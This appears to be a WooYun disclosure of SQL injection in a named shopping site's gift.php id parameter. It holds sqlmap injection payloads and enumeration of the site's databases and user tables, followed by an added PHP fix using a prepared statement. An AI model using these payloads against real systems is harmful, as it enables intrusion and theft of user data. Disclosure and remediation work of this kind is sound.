WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reading -------- http://drop.zone.ci/
2015-12-07: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly. 2016-01-21: The vendor has proactively ignored the vulnerability; details disclosed to the public.
As the title says.
http://www.taowola.com/gift.php?type=info&id=200
The id parameter is injectable.
sqlmap identified the following injection points with a total of 50 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=info&id=200 AND 4843=4843

    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: type=info&id=-6615 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a7571693a,0x5168744a575678484448,0x3a7476793a),NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: type=info&id=200 AND SLEEP(5)
---
web application technology: PHP 5.4.23, Nginx
back-end DBMS: MySQL 5.0.11
Check the current database and user.
web application technology: PHP 5.4.23, Nginx
back-end DBMS: MySQL 5.0.11
current user: '10.47.36.39:12945'
current database: 'taowola'
current user is DBA: False
List the databases.
web application technology: PHP 5.4.23, Nginx
back-end DBMS: MySQL 5.0.11
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] taowola
66 tables; not all of them are listed here.
web application technology: PHP 5.4.23, Nginx
back-end DBMS: MySQL 5.0.11
Database: taowola
[66 tables]
Look directly at the row counts.
web application technology: PHP 5.4.23, Nginx
back-end DBMS: MySQL 5.0.11
Database: taowola
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| wp_jifen_log              | 180981  |
| wp_user                   | 116896  |
| logs                      | 56728   |
| wp_items                  | 47381   |
Fix: filter the parameter.
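The report's only remediation advice is "filter the parameter". The PHP below is an added example, not the site's own gift.php code: it shows the concatenation pattern that lets the boolean-based and UNION payloads from the sqlmap output above rewrite the query, next to a hardened lookup that validates id as a positive integer and binds it with a prepared statement. The gifts table, its columns and the in-memory SQLite database are assumptions so the script runs offline; the same PDO calls work unchanged against MySQL.

```php
<?php
// Added example (not the vulnerable site's code). Table/column names are
// assumed; an in-memory SQLite DB stands in for the MySQL backend.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE gifts (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO gifts (id, name) VALUES (200, 'sample gift 200'), (201, 'sample gift 201')");

// Vulnerable pattern: the raw query-string value is concatenated into SQL,
// so anything after the number becomes part of the statement.
function getGiftVulnerable(PDO $pdo, string $id): array
{
    $sql = 'SELECT id, name FROM gifts WHERE id = ' . $id;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: (1) reject anything that is not a positive integer before
// it reaches the database, (2) bind the value as a parameter so the DBMS never
// parses it as SQL. Both layers together are what "filter the parameter" means.
function getGiftSafe(PDO $pdo, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // invalid id: refuse the request instead of "cleaning" it
    }
    $stmt = $pdo->prepare('SELECT id, name FROM gifts WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a legitimate id plus the boolean-based and a UNION-style
// value of the kind sqlmap reported above (column count adjusted to this table).
$inputs = ['200', '200 AND 4843=4843', '-6615 UNION ALL SELECT NULL,NULL'];

foreach ($inputs as $input) {
    try {
        $vulnRows = count(getGiftVulnerable($pdo, $input));
    } catch (PDOException $e) {
        $vulnRows = 'error';
    }
    $safeRow = getGiftSafe($pdo, $input);
    printf("input=%-32s vulnerable_rows=%-5s safe_result=%s\n",
        var_export($input, true),
        (string) $vulnRows,
        $safeRow === null ? 'rejected' : $safeRow['name']);
}
```

Run with `php example.php`: the vulnerable lookup returns a row for every input (the injected conditions and UNION are executed), while the hardened lookup returns a gift only for the plain `200` and rejects the other two before any query is sent.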
Could not reach the vendor, or the vendor actively refused.